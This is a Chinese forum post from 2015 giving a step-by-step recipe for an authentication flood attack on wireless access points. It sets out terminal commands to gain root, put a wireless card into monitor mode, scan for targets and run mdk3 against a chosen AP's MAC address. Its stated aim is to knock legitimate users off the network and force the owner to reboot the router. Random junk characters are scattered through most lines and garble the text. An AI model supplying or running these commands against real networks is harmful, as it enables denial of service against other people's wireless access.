本帖最后由 191966260 于 2015-2-2 22:49 编辑
' v9 L3 K% [( k4 k* l- k1 B$ C& [' {- A( ?, e. X
身份验证攻击效果说明:" _9 |! V" J6 l9 h+ a% n L7 u
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 0 w7 Y: ?8 `2 I6 Y+ n" E
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):
& e, C* a9 q7 M( ysudo su 或 sudo -i3 _- G8 e+ t/ ?! ~$ z
打开mdk3:
9 P7 @+ X, A. ~8 _sudo mdk3 首先检测网卡:
$ g8 Y0 o. v) S9 P& z, {ifconfig -a 然后模拟端口(一般默认wlan0):+ S. e( F( e* v, A4 t E: O8 `0 ]0 l
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):
* P8 w9 g* J5 O# i2 n# Yairodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00)
S- \' E1 i+ f: s: pmdk3 mon0 a -a mac2 L# G: _$ |8 Z% R, @ U0 i
7 R/ P8 ~' C5 @! J- c# P. {& l# V) r* r9 |' v! d) v: m O# ^
+ F5 u* p: V- g2 T
爱生活,爱anywlan,我是阿龙!
8 D8 I, R6 ?4 r |